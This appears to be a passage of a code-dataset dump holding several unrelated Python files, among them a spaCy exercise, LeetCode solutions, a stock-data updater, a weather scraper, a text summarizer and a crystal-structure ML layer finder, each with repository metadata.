plt.show();\n","repo_name":"chiragasu/FSL-Final-Project","sub_path":"src/UtilityFunctions.py","file_name":"UtilityFunctions.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2093855942","text":"import spacy\n\nnlp = spacy.blank(\"fr\")\n\n# Traite le texte\ndoc = nlp(\n \"En 1990, plus de 60 % de la population d'Asie orientale vivait dans une pauvreté extrême. \"\n \"Actuellement c'est moins de 4 %.\"\n)\n\n# Itère sur les tokens du doc\nfor token in doc:\n # Vérifie si le token ressemble à un nombre\n if token.like_num:\n # Obtiens le token suivant dans le document\n next_token = doc[token.i + 1]\n # Vérifie si le texte du token suivant est égal à \"%\"\n if next_token.text == \"%\":\n print(\"Pourcentage trouvé :\", token.text)\n","repo_name":"explosion/spacy-course","sub_path":"exercises/fr/solution_01_04.py","file_name":"solution_01_04.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"fr","doc_type":"code","stars":2221,"dataset":"github-code","pt":"2"} +{"seq_id":"25420508536","text":"class P1:\n def makeGood(self, s: str) -> str:\n A = list(s)\n i = 0\n while i+1 < len(A):\n if abs(ord(A[i+1]) - ord(A[i])) == abs(ord('A') - ord('a')):\n del A[i:i+2]\n continue\n i+=1 \n ret = \"\".join(A) \n return ret if ret == s else self.makeGood(ret)\n\nclass P2:\n def findKthBit(self, n: int, k: int) -> str:\n A = [0]\n for _ in range(n-1):\n A = A + [1] + [*map(lambda x: x^1, A)][::-1]\n return str(A[k-1]) \n\nclass P3:\n def maxNonOverlapping(self, nums: [int], target: int) -> int:\n last = collections.defaultdict(int)\n last[0] = -1\n cur = ret = 0\n ep = -2\n for i,x in enumerate(nums):\n cur += x\n y = cur - target \n if y in last and last[y] >= ep:\n ep = i\n ret += 1\n last[cur] = i \n return ret \nclass P4:\n def minCost(self, n: int, cuts: [int]) -> int:\n cuts = [0,n] + cuts\n cuts = sorted(cuts)\n A = [cuts[i+1] - cuts[i] for i in range(len(cuts)-1)]\n return self.mergeStones(A, 2)\n\n def mergeStones(self, stones: [int], K: int) -> int:\n N = len(stones)\n if (N - 1) % (K - 1): return -1\n prefix = [0] * (N+1)\n for i in range(1,N+1): prefix[i] = stones[i-1] + prefix[i-1]\n dp = [[0] * N for _ in range(N)]\n for m in range(K, N+1):\n for i in range(N-m+1):\n dp[i][i+m-1] = min(dp[i][k] + dp[k+1][i+m-1] for k in range(i, i+m-1, K-1)) + (prefix[i+m] - prefix[i] if (m-1)%(K-1) == 0 else 0)\n return dp[0][N-1]\n\nif __name__ == \"__main__\":\n print(\"Build Success!\")","repo_name":"dylansun/LeetcodeContest","sub_path":"src_python3/C200_209/C201.py","file_name":"C201.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"20357231826","text":"def tft_98(h1: list, h2: list, counter=100):\n if len(h1) == 0:\n return \"C\"\n elif len(h1) >= int(counter - 2):\n return \"D\"\n counter_d = 0\n for _ in range(len(h2)):\n if h2[_ - 1] == \"D\":\n counter_d += 1\n if counter_d > round(counter / 13):\n return \"D\"\n else:\n return h2[len(h2) - 1]","repo_name":"artemka169/prisoners_dilemma","sub_path":"artem.py","file_name":"artem.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14069001654","text":"\"\"\"\nThis file updates stock information every minute to allow live updates and day trading\n\"\"\"\n\nimport time\nfrom abc import abstractmethod\nfrom datetime import datetime\nfrom threading import Lock, Thread\nfrom typing import List\n\nfrom src import crud\nfrom src.db.session import SessionThreadLocal\nfrom src.schemas.time_series import TimeSeriesDBcreate\n\nfrom .data_provider import DataProvider\n\n\nclass RepeatedUpdateProvider(DataProvider):\n \"\"\"\n Update stock data repeatedly, where update time are determined\n by [repeat_in_x_seconds] (see RepeatScheduler)\n \"\"\"\n\n def __init__(self, symbol_to_exchange, repeat_in_x_seconds, db, **kwargs):\n super().__init__(**kwargs)\n\n self._symbols = list(symbol_to_exchange.keys())\n self.symbol_to_exchange = symbol_to_exchange\n self.db = db\n\n self.repeat_in_x_seconds = repeat_in_x_seconds\n\n self._data = {}\n self.id = 0\n\n self.lock = Lock()\n\n def pre_start(self):\n crud.stock.remove_all_hist(db=self.db)\n\n def on_start(self):\n \"\"\"\n Initialise db\n \"\"\"\n data = self.get_init_data()\n print(\"===== INITIALISING MARKET DATA =====\")\n for symbol, stock_data in data.items():\n print(f\"Number of entries for {symbol}: {len(stock_data)}\")\n time_series = stock_data_as_time_series(symbol, stock_data)\n crud.stock.update_time_series(db=self.db, symbol=symbol, time_series=time_series)\n print(\"===== FINISHED INITIALISATION =====\")\n self.cache_latest_data(data)\n\n RepeatScheduler(self.update, self.repeat_in_x_seconds).start()\n\n @abstractmethod\n def get_init_data(self):\n \"\"\"\n Returns data to initialise the db with\n \"\"\"\n pass\n\n def update(self):\n \"\"\"\n Retrieve data, update db and [self]'s cache\n \"\"\"\n data = self.get_update_data()\n for symbol, stock_data in data.items():\n time_series = stock_data_as_time_series(symbol, stock_data)\n crud.stock.update_time_series(db=SessionThreadLocal(), symbol=symbol, time_series=time_series)\n self.cache_latest_data(data)\n self.notify()\n\n @abstractmethod\n def get_update_data(self):\n \"\"\"\n Returns data to update the db with\n \"\"\"\n pass\n\n def cache_latest_data(self, msg):\n \"\"\"\n Cache part of the data so that they can be directly accessed without db\n \"\"\"\n with self.lock:\n temp = {**self._data} # shallow copy\n\n for symbol, data in msg.items():\n temp[symbol] = dict(\n curr_day_open=float(data[0][\"open\"]),\n curr_day_close=float(data[0][\"close\"]),\n prev_day_close=float(data[1][\"close\"]),\n )\n\n # switch out references\n with self.lock:\n self._data = temp\n self.id += 1\n\n @property\n def data_with_id(self):\n with self.lock:\n return (self._data, self.id)\n\n def get_stock(self, symbol):\n \"\"\"\n Get stock given [symbol]\n \"\"\"\n return crud.stock.get_by_symbol(db=self.db, symbol=symbol)\n\n @property\n def symbols(self):\n return self._symbols\n\n\ndef stock_data_as_time_series(symbol, stock_data) -> List[TimeSeriesDBcreate]:\n def to_timeseries_schema(day_data):\n return TimeSeriesDBcreate(\n date=day_data[\"datetime\"],\n symbol=symbol,\n low=day_data[\"low\"],\n high=day_data[\"high\"],\n open=day_data[\"open\"],\n close=day_data[\"close\"],\n volume=day_data[\"volume\"],\n )\n\n return [to_timeseries_schema(x) for x in stock_data]\n\n\ndef seconds_until_next_minute(at_second=15):\n \"\"\"\n e.g. if at_second=15, return the number of seconds\n until the next minute, at the 15 seconds mark\n\n i.e.:\n - if now() is 10:05:10, then returns 10:06:15\n - if now() is 10:05:20, then returns 10:06:15\n \"\"\"\n return 60 + at_second - datetime.now().second\n\n\nclass RepeatScheduler(Thread):\n \"\"\"\n Repeatedly executes [callback] at times specified by [repeat_in_x_seconds],\n which could either be a function or a literal number\n \"\"\"\n\n def __init__(self, callback, repeat_in_x_seconds):\n super().__init__()\n self.daemon = True\n self.callback = callback\n self.repeat_in_x_seconds = repeat_in_x_seconds\n\n def run(self):\n while True:\n if callable(self.repeat_in_x_seconds):\n x = self.repeat_in_x_seconds()\n else:\n x = self.repeat_in_x_seconds\n\n time.sleep(x)\n self.callback()\n","repo_name":"xpire/cs3900-project","sub_path":"backend/src/domain_models/data_provider/repeated_update_provider.py","file_name":"repeated_update_provider.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32783014236","text":"import datetime\r\nimport re\r\n\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\n# Адрес страницы и название файла с результатом\r\nURL_TEMPLATE = \"https://pogodaspb.info/arch.php?date=ymd\"\r\nFILE_NAME = \"Weather.csv\"\r\n\r\n\r\ndef parse(url, year):\r\n # Создание результирующего списка и указание года, откуда пойдёт чтение\r\n data = []\r\n if year % 4 == 0:\r\n leap_year = True\r\n else:\r\n leap_year = False\r\n day = 1\r\n month = 1\r\n date = datetime.date(year, 1, 1)\r\n\r\n # Указание последнего года\r\n while True:\r\n # Добавление в начало строки года, который рассматривается\r\n temp_list = []\r\n prec_list = []\r\n cur_date = date.strftime('%Y-%m-%d')\r\n cur_month = int(date.strftime('%m'))\r\n cur_year = int(date.strftime('%Y'))\r\n\r\n if cur_month != month:\r\n month = cur_month\r\n data.append('')\r\n if cur_year != year:\r\n return data\r\n\r\n # Изменение URL ссылки по-требуемому месяцу\r\n cur_url = url.replace('ymd', cur_date)\r\n # Отправка URL запроса\r\n r = requests.get(cur_url)\r\n # Считываем код страницы\r\n soup = bs(r.text, \"html.parser\")\r\n\r\n # Находим и считываем нужные нам элементы\r\n post = soup.find_all('p', {\"class\": \"h5 color1\"})\r\n for i in range(int(len(post) / 2)):\r\n temp = post[1 + 2 * i].text\r\n temp_list.append(float(temp[:-1]))\r\n post = soup.find_all('p', {\"class\": \"h8\"})\r\n for i in range(len(post)):\r\n prec = post[i].text\r\n if len(re.findall('(\\d+)', prec)) != 0:\r\n prec_list.append(float(prec[41:-6]))\r\n else:\r\n prec_list.append(0.0)\r\n\r\n if leap_year and day == 59:\r\n average = [round(sum(temp_list) / len(temp_list), 1), round(sum(prec_list) / len(prec_list) * 10, 1)]\r\n elif leap_year and day == 60:\r\n day -= 1\r\n leap_year = False\r\n data.append(str(day) + ',' + str(round((round(sum(temp_list) / len(temp_list), 1) + average[0]) / 2, 1)) +\r\n ',' + str(round((round(sum(prec_list) / len(prec_list) * 10, 1) + average[1]) / 2, 1)))\r\n else:\r\n data.append(str(day) + ',' + str(round(sum(temp_list) / len(temp_list), 1)) +\r\n ',' + str(round(sum(prec_list) / len(prec_list) * 10, 1)))\r\n\r\n day += 1\r\n date = date + datetime.timedelta(days=1)\r\n\r\n\r\n# Запись в файл\r\ndf = pd.DataFrame(data=parse(URL_TEMPLATE, 2014))\r\ndf.to_csv(FILE_NAME, header=False, index=False)\r\n","repo_name":"cyber-dno/Negative-Selection-Algorithm-for-Weather-Analysing","sub_path":"WeatherParser_Gysmeteo.py","file_name":"WeatherParser_Gysmeteo.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40922905728","text":"from heapq import nlargest\nimport spacy\nfrom spacy import displacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\n\ntext = \"\"\"A programming language is a system of notation for writing computer programs.[1] Most programming languages are text-based formal languages, but they may also be graphical. They are a kind of computer language.\n\nThe description of a programming language is usually split into the two components of syntax (form) and semantics (meaning), which are usually defined by a formal language. Some languages are defined by a specification document (for example, the C programming language is specified by an ISO Standard) while other languages (such as Perl) have a dominant implementation that is treated as a reference. Some languages have both, with the basic language defined by a standard and extensions taken from the dominant implementation being common.\n\nProgramming language theory is the subfield of computer science that studies the design, implementation, analysis, characterization, and classification of programming languages.\"\"\"\n\ndef summarizer(rawdocs):\n stopwords = list(STOP_WORDS)\n # print(stopwords)\n\n nlp = spacy.load('en_core_web_sm')\n doc = nlp(rawdocs)\n # print(doc)\n entities = [{\"text\": ent.text, \"label\": ent.label_} for ent in doc.ents]\n\n html = displacy.render(doc,style=\"ent\")\n\n word_freq = {}\n for word in doc :\n if word.text.lower() not in stopwords and word.text.lower() not in punctuation:\n if word.text not in word_freq.keys():\n word_freq[word.text] = 1\n else:\n word_freq[word.text] += 1\n \n # print(word_freq)\n\n max_freq = max(word_freq.values())\n print(max_freq)\n\n for word in word_freq.keys():\n word_freq[word]=word_freq[word]/max_freq\n\n # print(word_freq)\n\n sent_tokens = [sent for sent in doc.sents]\n\n # print(sent_tokens)\n\n sent_scores = {}\n\n for sent in sent_tokens:\n for word in sent:\n if word.text in word_freq.keys():\n if sent not in sent_scores.keys():\n sent_scores[sent] = word_freq[word.text]\n else:\n sent_scores[sent] += word_freq[word.text]\n\n # print(sent_scores)\n percent = 25;\n percent = percent/100;\n select_len = int(len(sent_tokens)*percent)\n # print(select_len)\n\n summary = nlargest(select_len , sent_scores , key = sent_scores.get)\n # print(summary)\n\n final_summary = [word.text for word in summary]\n summary = ' '.join(final_summary)\n\n # print(text)\n # print(summary)\n\n # print(\"Length of original text \" , len(text.split(' ')))\n # print(\"Length of summary text \" , len(summary.split(' ')))\n # orig_text = rawdocs\n return summary , doc, len(rawdocs.split(' ')) , len(summary.split(' ')) , entities , html\n\n","repo_name":"rBhagat4196/NER-and-Text-Summarizer","sub_path":"text_summary.py","file_name":"text_summary.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22707847976","text":"import json\nimport math\nimport time\n\nimport ase\nimport ase.io\nimport numpy as np\nimport shap\nimport spglib\n\n\nfrom ase import Atoms\nfrom ase.data import chemical_symbols\n\nfrom pymatgen.io.ase import AseAtomsAdaptor\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom .utils.structures import (\n ase_from_tuple,\n get_xsf_structure,\n tuple_from_ase,\n)\nfrom tools_barebone import get_tools_barebone_version\nfrom .utils.lowdimfinder import (\n LowDimFinder,\n _map_atomic_number_radii_van_der_Waals_alvarez,\n)\nfrom .utils.pointgroup import (\n pg_number_from_hm_symbol,\n prepare_pointgroup,\n prepare_spacegroup,\n SYMPREC,\n)\n\n###Featurization\nimport matminer\nfrom matminer.featurizers.base import MultipleFeaturizer\n\nfrom matminer.featurizers.structure import (\n SiteStatsFingerprint,\n ChemicalOrdering,\n MaximumPackingEfficiency,\n)\n\n### ML Model\nimport joblib\n\n# Version of this tool\n__version__ = \"21.11.0\"\n\n\ndef get_feature_name(pos): # pylint: disable=too-many-branches\n \"\"\"Return the name of the feature, given its index `pos`.\"\"\"\n\n local_env_prop_names = [\n \"Atomic number\",\n \"Mendeleev number\",\n \"Atomic weight\",\n \"Melting temperature\",\n \"Periodic table column\",\n \"Periodic table row\",\n \"Covalent radius\",\n \"Electronegativity\",\n \"Number of filled s valence orbitals\",\n \"Number of filled p valence orbitals\",\n \"Number of filled d valence orbitals\",\n \"Number of filled f valence orbitals\",\n \"Number of valence electrons\",\n \"Number of unfilled s valence orbitals\",\n \"Number of unfilled p valence orbitals\",\n \"Number of unfilled d valence orbitals\",\n \"Number of unfilled f valence orbitals\",\n \"Number of unfilled valence orbitals\",\n \"DFT volume per atom\",\n \"DFT band gap\",\n \"DFT magnetic moment\",\n \"Spacegroup number\",\n ]\n assert len(local_env_prop_names) == 22\n local_env_stats = [\"min\", \"max\", \"range\", \"mean\", \"mean abs deviation\"]\n assert len(local_env_stats) == 5\n\n if pos == 0:\n return \"Chemical ordering (first neighbors)\"\n if pos == 1:\n return \"Chemical ordering (second neighbors)\"\n if pos == 2:\n return \"Chemical ordering (third neighbors)\"\n if pos == 3:\n return \"Max packing efficiency\"\n # 4 above, 22*5 = 110 more, if the index is > 114 it's out of bounds\n if pos >= 114:\n raise ValueError(\"Only 114 features known\")\n\n idx = pos - 4\n prop_idx = idx % len(local_env_prop_names)\n stats_idx = idx // len(local_env_prop_names)\n return f\"{local_env_prop_names[prop_idx]} ({local_env_stats[stats_idx]})\"\n\n\ndef nice_print_rot(value, threshold=1.0e-4):\n \"\"\"\n Converts a float number to a LaTeX string, possibly converting \"common\" values (integers, and simple square roots)\n to nicer form.\n\n :param value: a float value\n :param threshold: a numerical threshold to decide if a number is an integer, a square root, ...\n :return: a (LaTeX) string\n \"\"\"\n int_value = int(round(value))\n\n if abs(int_value - value) < threshold:\n return f\"{int_value:d}\"\n if abs(value - 0.5) < threshold:\n return r\"\\frac{1}{2}\"\n if abs(value - (-0.5)) < threshold:\n return r\"-\\frac{1}{2}\"\n if abs(value - math.sqrt(2) / 2) < threshold:\n return r\"\\frac{\\sqrt{2}}{2}\"\n if abs(value - (-math.sqrt(2) / 2)) < threshold:\n return r\"-\\frac{\\sqrt{2}}{2}\"\n if abs(value - math.sqrt(3) / 2) < threshold:\n return r\"\\frac{\\sqrt{3}}{2}\"\n if abs(value - (-math.sqrt(3) / 2)) < threshold:\n return r\"-\\frac{\\sqrt{3}}{2}\"\n\n # As a fallback, return the float representation\n return f\"{value:10.5f}\"\n\n\ndef process_structure_core(\n structure, logger, flask_request\n): # pylint: disable=unused-argument, too-many-locals, too-many-statements, too-many-branches\n start_time = time.time()\n\n # Get information on the crystal structure to be shown later\n inputstructure_cell_vectors = [\n [idx, coords[0], coords[1], coords[2]]\n for idx, coords in enumerate(structure[0], start=1)\n ]\n inputstructure_symbols = [chemical_symbols[num] for num in structure[2]]\n inputstructure_atoms_scaled = [\n [label, coords[0], coords[1], coords[2]]\n for label, coords in zip(inputstructure_symbols, structure[1])\n ]\n\n inputstructure_positions_cartesian = np.dot(\n np.array(structure[1]),\n np.array(structure[0]),\n ).tolist()\n inputstructure_atoms_cartesian = [\n [label, coords[0], coords[1], coords[2]]\n for label, coords in zip(\n inputstructure_symbols, inputstructure_positions_cartesian\n )\n ]\n\n # prepare template dictionary to return later\n return_data = {\n \"app_data_json\": json.dumps(\n None\n ), # None by default, if e.g. layers are not found\n \"common_layers_search\": None, # None by default\n \"layers\": [], # Empty list if no layers found\n \"has_common_layers\": False,\n \"xsfstructure\": get_xsf_structure(structure),\n \"inputstructure_cell_vectors\": inputstructure_cell_vectors,\n \"inputstructure_atoms_scaled\": inputstructure_atoms_scaled,\n \"inputstructure_atoms_cartesian\": inputstructure_atoms_cartesian,\n \"ase_version\": ase.__version__,\n \"matminer_version\": matminer.__version__,\n \"joblib_version\": joblib.__version__,\n \"tools_barebone_version\": get_tools_barebone_version(),\n \"this_tool_version\": __version__,\n \"ML_predictions\": False,\n }\n\n asecell = ase_from_tuple(structure)\n\n # Get the primitive cell from the ase cell obtained from the user\n # NOTE! Beside getting the primitive cell, this function will also refine its symmetry.\n primitive_tuple = spglib.find_primitive(\n (\n asecell.get_cell(),\n asecell.get_scaled_positions(),\n asecell.get_atomic_numbers(),\n ),\n symprec=SYMPREC,\n )\n # Get now the conventional cell (it re-does a symmetry analysis)\n dataset = spglib.get_symmetry_dataset(primitive_tuple)\n conventional_tuple = (\n dataset[\"std_lattice\"],\n dataset[\"std_positions\"],\n dataset[\"std_types\"],\n )\n conventional_asecell = ase_from_tuple(conventional_tuple)\n\n bulk_spg = SpacegroupAnalyzer(\n AseAtomsAdaptor().get_structure(conventional_asecell), symprec=SYMPREC\n )\n pg_bulk_number = pg_number_from_hm_symbol(bulk_spg.get_point_group_symbol())\n return_data[\"pointgroup_bulk\"] = prepare_pointgroup(pg_bulk_number)\n return_data[\"spacegroup_bulk\"] = prepare_spacegroup(bulk_spg)\n\n # NOTE: there are cases in which it might not be detected - we'll deal with how to display those in the UI\n\n # From now on, I will work with the conventional cell rather than the one specified by the user\n # This is important because we sometimes (in the output) make assumptions that the number of layers found\n # is the number of layers in the conventional cell (e.g. when we say \"Multilayer spacegroup\n # for N >= {num_layers_conventional}\").\n\n ### MOHAMMAD: Run LowDimFinder\n for radiiOffset in [-0.75, -0.7, -0.65, -0.6, -0.55]:\n\n low_dim_finder = LowDimFinder(\n aiida_structure=conventional_asecell,\n vacuum_space=40.0,\n radii_offset=radiiOffset,\n bond_margin=0.0,\n max_supercell=3,\n min_supercell=3,\n rotation=True,\n full_periodicity=False,\n radii_source=\"alvarez\",\n orthogonal_axis_2D=True,\n )\n\n ### MOHAMMAD: Replace four variables (is_layered, layer_structures, layer_indices, rotated_asecell) with LowDimFinder Results!\n\n low_dim_finder_results = low_dim_finder.get_group_data()\n\n if 2 in low_dim_finder_results[\"dimensionality\"]:\n is_layered = True\n\n layer_structures = []\n layer_indices = []\n for i in range(len(low_dim_finder_results[\"dimensionality\"])):\n if low_dim_finder_results[\"dimensionality\"][i] == 2:\n struc = Atoms(\n symbols=low_dim_finder_results[\"chemical_symbols\"][i],\n positions=low_dim_finder_results[\"positions\"][i],\n cell=low_dim_finder_results[\"cell\"][i],\n tags=low_dim_finder_results[\"tags\"][i],\n )\n layer_structures.append(struc)\n layer_indices.append(\n low_dim_finder._get_unit_cell_groups()[ # pylint: disable=protected-access\n i\n ]\n )\n rotated_asecell = low_dim_finder._rotated_structures[ # pylint: disable=protected-access\n i\n ]\n break\n if radiiOffset == -0.55:\n is_layered = False\n layer_indices = None\n layer_structures = None\n rotated_asecell = None\n\n ### MOHAMMAD: Just to be consistant with before and avoid further changes!\n ### MOHAMMAD: layer_indices must be smaller than the number of elements in a unitcell!\n ### MOHAMMAD: For example, change: layer_indices of [[0, 4, 8, 11, 15, 19, 20, 75, 79, 84, 88, 95],\n ### MOHAMMAD: [1, 2, 5, 6, 9, 10, 13, 14, 17, 18, 21, 22]] to [[0, 4, 8, 11, 15, 19, 20, 3, 7, 12, 16, 23],\n ### MOHAMMAD: [1, 2, 5, 6, 9, 10, 13, 14, 17, 18, 21, 22]] -- In this case the number of element is 24!\n\n ### MOHAMMAD: More efficient way:\n\n if is_layered:\n for i in range(len(layer_indices)): # pylint: disable=consider-using-enumerate\n for j in range(len(layer_indices[i])):\n if layer_indices[i][j] >= len(conventional_asecell):\n tmp = layer_indices[i][j]\n layer_indices[i][j] = tmp % len(conventional_asecell)\n\n ### MOHAMMAD: replace all the components and commented!\n\n # Get the scaled radii for the bonds detection\n\n ### MOHAMMAD: Used vdW radii in order to draw bonds by visualizer\n\n scaled_radii_per_site = np.array(\n [\n _map_atomic_number_radii_van_der_Waals_alvarez.get(atom.number)\n for atom in asecell\n ]\n )\n\n # This is a dict of the form {\"Na\": 1.3, \"C\": 1.5}, ..\n scaled_radii_per_kind = {\n atom.symbol: scaled_radius\n for atom, scaled_radius in zip(asecell, scaled_radii_per_site)\n }\n\n # I now construct the list of *pairwise* threshold distances, to be passed to JSMOL\n # In theory, I could use simply \"set bondTolerance 0;\" and \"{_P}.bondingRadius = 1.4158\" (in this example, for\n # the P element). However, it does not seem to be setting the threshold for showing a bond at the sum,\n # but at some different value.\n # Therefore, I instead compute the pairwise threshold distance, say for elements Ga and As, and pass the following\n # JSMOL string (if, say, I don't want bonds for atoms closer than 0.2 ang, and the threshold distance is 2.27 ang):\n # \"connect 0.2 2.27 {_Ga} {_As};\"\n # It is good to prepend this with \"set autobond off;\" before loading, or use first a \"connect delete;\" to remove\n # existing bonds\n\n ### MOHAMMAD: Add offset to the vdw radii\n\n jsmol_bond_commands = []\n min_bonding_distance = 0.2 # ang\n for kind1, radius1 in scaled_radii_per_kind.items():\n for kind2, radius2 in scaled_radii_per_kind.items():\n if kind1 > kind2:\n # Just do one of the two pairs\n continue\n jsmol_bond_commands.append(\n f\"connect {min_bonding_distance} {radius1+radius2+2*radiiOffset} {{_{kind1}}} {{_{kind2}}}; \"\n )\n\n # Encode as JSON string before sending, so it's safe to inject in the code\n return_data[\"jsmol_bond_command\"] = json.dumps(\"\".join(jsmol_bond_commands))\n\n if not is_layered:\n # I return here; some sections will not be present in the output so they will not be shown.\n compute_time = time.time() - start_time\n return_data[\"compute_time\"] = compute_time\n logger.debug(json.dumps(return_data, indent=2, sort_keys=True))\n return return_data\n\n layer_xsfs = [\n get_xsf_structure(tuple_from_ase(layer_structure))\n for layer_structure in layer_structures\n ]\n\n return_data[\"layers\"] = list(\n zip(\n layer_xsfs,\n # Needed because this might return int64 numpy objects, not JSON-serializable\n [\n [int(index) for index in this_layer_indices]\n for this_layer_indices in layer_indices\n ],\n )\n )\n\n # This is returned both in the return_data, for the HTML view, and in the app data,\n # to be set as a minimum for the REST API requests\n num_layers_bulk = len(layer_indices)\n return_data[\"num_layers_bulk\"] = num_layers_bulk\n\n return_data[\"rotated_cell\"] = {\n \"layer_cell\": rotated_asecell.cell.tolist(),\n \"layer_atoms\": [\n list(\n zip(\n rotated_asecell[this_layer_indices].symbols,\n rotated_asecell[this_layer_indices].positions.tolist(),\n )\n )\n for this_layer_indices in layer_indices\n ],\n }\n\n ### MOHAMMAD: Here we generate features for the strucutres that passed the LowDimFinder\n\n featurizer = MultipleFeaturizer(\n [\n ChemicalOrdering(),\n MaximumPackingEfficiency(),\n SiteStatsFingerprint.from_preset(\"LocalPropertyDifference_ward-prb-2017\"),\n ]\n )\n\n structures_pg = AseAtomsAdaptor.get_structure(conventional_asecell)\n\n list_structures = {}\n list_structures[\"structure\"] = structures_pg\n\n print(structures_pg)\n X = featurizer.featurize_many([structures_pg], ignore_errors=True)\n print(X)\n\n ### MOHAMMAD: Load the trained model\n\n loaded_RF = joblib.load(\n \"/home/app/code/webservice/static/random_forest_model.joblib\"\n )\n explainer = shap.Explainer(loaded_RF)\n\n ### MOHAMMAD: make prediction!\n pred_RF = loaded_RF.predict(X)\n if pred_RF == [1]:\n return_data[\"ML_predictions\"] = True\n else:\n return_data[\"ML_predictions\"] = False\n\n # Also get the SHAP values\n shap_explanation = explainer(np.array(X))\n # This is now an array of the |shap|\n abs_shap_values = np.abs(shap_explanation[0, :, 1].values)\n\n MAX_DISPLAY = 20\n sorted_shaps = sorted(list(zip(abs_shap_values, range(len(abs_shap_values)))))[::-1]\n\n sorted_shap_with_feature_name = []\n for idx in range(MAX_DISPLAY):\n abs_shap, feature_pos = sorted_shaps[idx]\n sorted_shap_with_feature_name.append([get_feature_name(feature_pos), abs_shap])\n sorted_shap_with_feature_name.append(\n [\n f\"Sum of {len(sorted_shaps) - MAX_DISPLAY} other features\",\n sum(shap[0] for shap in sorted_shaps[MAX_DISPLAY:]),\n ]\n )\n return_data[\"sorted_abs_shaps\"] = sorted_shap_with_feature_name\n\n # I return here; some sections will not be present in the output so they will not be shown.\n compute_time = time.time() - start_time\n return_data[\"compute_time\"] = compute_time\n logger.debug(json.dumps(return_data, indent=2, sort_keys=True))\n return return_data\n","repo_name":"epfl-theos/tool-ml-layer-finder","sub_path":"compute/ml_layer_finder_engine.py","file_name":"ml_layer_finder_engine.py","file_ext":"py","file_size_in_byte":15374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"41583031906","text":"IN = input()\n\nline = IN.split(' ')\n\nn1 = float(line[0])\nn2 = float(line[1])\nn3 = float(line[2])\nn4 = float(line[3])\n\nmedia=((n1*2)+(n2*3)+(n3*4)+(n4*1) )/10\nprint(\"Media: %.1f\"%media)\n\nif(media >= 7.0):\n print(\"Aluno aprovado.\")\nelif(media <5.0):\n print(\"Aluno reprovado.\")\nelif(media >=5.0 and media <=6.9):\n print(\"Aluno em exame.\")\n ex_num = float(input())\n print(\"Nota do exame: %.1f\"%ex_num)\n final_num=(media+ex_num)/2\n if(final_num >= 5.0):\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n print(\"Media final: %.1f\"%final_num)\n \n \n","repo_name":"AKmahim/URI-solution-in-python","sub_path":"uri1040py.py","file_name":"uri1040py.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36843310998","text":"class Solution:\n def numOfSubarrays(self, arr):\n n = len(arr)\n evens, odds = [0] * n, [0] * n\n evens[0] += not arr[0] % 2\n odds[0] += arr[0] % 2\n for i in range(1, n):\n evens[i] = odds[i - 1] if arr[i] % 2 else 1 + evens[i - 1]\n odds[i] = 1 + evens[i - 1] if arr[i] % 2 else odds[i - 1]\n return sum(odds) % (10**9 + 7)\n","repo_name":"simonesestili/problems-dsa","sub_path":"1524.py","file_name":"1524.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19624351911","text":"#%%\nfrom __future__ import annotations\n\nfrom dataclasses import asdict, dataclass, field\nfrom datetime import datetime as dt\nfrom typing import Dict, Optional, TypedDict\n\nfrom api.src.classes.WeatherInformation import WeatherInformation\nfrom api.src.utils.enums import delta_time, time_limit\nfrom api.src.utils.functions import date_calc\nfrom api.src.utils.logger import logger\n\nPartialWeatherInformation = TypedDict(\n 'HeterogeneousDictionary',\n {\n 'timestamp': str,\n 'end_date': str,\n 'lon': float,\n 'lat': float,\n 'dataseries': WeatherInformation,\n },\n)\n\n\n@dataclass\nclass WeatherTimeSeries:\n \"\"\"A class used to represent a set of information retrieved from external\n endpoint\n\n Attributes\n ----------\n\n start_date: (str):a string representing a utc time in isoformat at the\n moment of processing\n\n end_date (string): a string representing a calculated utc time in isoformat\n\n lon (float): a float representation of a given Longitude\n\n lat (float): a float representation of a given Latitude\n\n timeseries (list[WeatherInformation]): an object that represents a time\n series and its encapsuled information\n\n Methods\n -------\n\n calc_timeseries(self, dataseries: list, now: str, time_limit: int = time_limit,\n date_calc: str = date_calc, ) -> WeatherTimeSeries:\n Update the attribute dataseries\n\n\n to_json(self) -> Dict[str, any]:\n Method to return the instantiated object as a dict\n \"\"\"\n\n start_date: str\n end_date: str\n lon: float\n lat: float\n timeseries: Optional[list[WeatherInformation]] = None\n\n def calc_timeseries(\n self,\n dataseries: list,\n now: str,\n time_limit: int = time_limit,\n date_calc: str = date_calc,\n ) -> WeatherTimeSeries:\n \"\"\"Update the attribute dataseries\n\n Given a received data series from external endpoint partially\n instantiated and then, updates this object with open_sky attribute\n\n Args:\n time_limit (int): an int representing a maximum of objects in data\n series calculated by rounding the quotient of delta_time by time_frame\n dataseries (list): _description_\n now (dt): _description_\n date_calc (dt, optional): _description_. Defaults to date_calc.\n\n Returns:\n WeatherTimeSeries: An instantiated object of the class WeatherTimeSeries\n \"\"\"\n result = list()\n logger.debug(dataseries)\n for data in dataseries[:time_limit]:\n constructor = {\n 'utc_timestamp': date_calc(now, 